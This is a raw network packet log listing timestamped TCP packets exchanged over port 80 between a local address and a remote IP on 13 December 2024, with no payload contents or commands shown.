Dec 13, 2024 01:37:36.004355907 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004364014 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004371881 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004379034 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004393101 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004432917 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004440069 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004452944 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004470110 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004477978 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004484892 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004498005 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004506111 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004513979 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004522085 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004528046 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004535913 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004542112 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004550934 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004558086 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004575968 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004585028 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004590988 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004597902 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004606009 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004615068 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004622936 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004630089 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004637957 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004646063 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004653931 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004662037 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.004669905 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005213976 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005224943 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005234957 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005243063 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005249977 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005258083 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005271912 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005294085 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005301952 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005307913 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005315065 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005331993 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005340099 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005361080 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005373955 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005381107 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005400896 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005409956 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005415916 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005538940 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005547047 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005553007 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005562067 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005568981 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005577087 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005584955 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005590916 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005599022 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005606890 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005615950 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005626917 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005640984 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005647898 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005655050 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005661964 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005669117 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005676031 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005683899 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005692005 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005698919 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.005707026 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006192923 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006232023 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006239891 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006313086 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006320953 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006329060 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006347895 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006359100 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006367922 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006422043 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006429911 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006441116 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006453991 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006463051 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006470919 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006498098 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006506920 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006513119 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006532907 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006541014 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006685972 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006695032 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006701946 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006711006 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006719112 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006725073 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006732941 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006741047 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006752014 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006758928 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006767035 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006774902 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006783009 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006791115 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.006798029 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007339001 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007353067 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007359982 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007368088 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007378101 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007405996 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007415056 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007427931 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007436037 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007462025 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007469893 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007482052 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007491112 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007529020 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007541895 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007555962 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007570982 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007580042 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007635117 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007662058 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007729053 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007740974 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007755041 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007761955 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007770061 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007777929 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007781029 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007786989 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007796049 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007803917 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007812023 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007818937 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007827044 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007834911 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007843971 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007850885 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007858038 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007865906 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.007921934 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008409977 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008511066 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008522034 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008543015 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008550882 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008557081 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008563995 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008586884 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008594990 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008600950 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008611917 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008626938 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008634090 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008647919 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008657932 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008682013 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008688927 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008696079 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008794069 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008801937 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008807898 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008816004 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008822918 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008831024 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008836985 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008845091 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008852959 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008860111 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008867025 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008876085 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008915901 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008924961 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008932114 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008939981 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008948088 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008955002 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008961916 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008970022 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008976936 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008984089 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008991003 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.008997917 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009450912 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009459972 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009469986 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009479046 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009486914 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009502888 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009510994 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009578943 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009593964 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009602070 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009609938 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009617090 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009624958 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009643078 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009650946 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009661913 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009675980 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009685993 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009692907 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009700060 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009799957 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009808064 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009814978 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009824038 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009830952 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009839058 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009846926 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009855986 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009862900 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.009871006 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011336088 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011356115 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011368036 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011377096 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011452913 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011495113 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011503935 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011509895 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011538982 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011554003 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011570930 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011586905 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011605024 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011615992 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011621952 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011630058 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011636972 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011655092 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011662960 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011780977 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011790037 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011795998 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011804104 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011811018 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011817932 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011825085 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011832952 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011841059 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011848927 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011857033 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011864901 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011877060 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011887074 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011894941 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011915922 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011924028 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011929989 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011938095 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011945009 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011953115 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011960030 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011966944 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011974096 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.011982918 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012262106 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012270927 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012285948 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012294054 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012332916 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012341976 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012348890 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012362957 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012376070 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012382984 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012423038 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012429953 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012447119 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012460947 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012471914 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012494087 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012510061 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012517929 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012526989 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012545109 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012609959 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012619019 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012624979 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.012633085 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014066935 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014076948 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014089108 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014096975 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014103889 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014111996 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014127970 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014136076 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014143944 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014170885 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014178991 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014184952 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014203072 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014211893 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014230967 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014239073 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014245033 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014252901 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014261007 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014362097 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014370918 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014377117 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014384031 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014391899 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014399052 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014425039 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014431953 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014440060 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.014447927 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.029777050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.029777050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.029827118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.029957056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.029984951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030003071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030025959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030040026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030065060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030076981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030101061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030121088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030180931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030208111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030222893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030247927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030263901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030286074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030311108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030333042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030359983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030391932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030391932 CET	49775	80	192.168.2.5	185.81.68.147
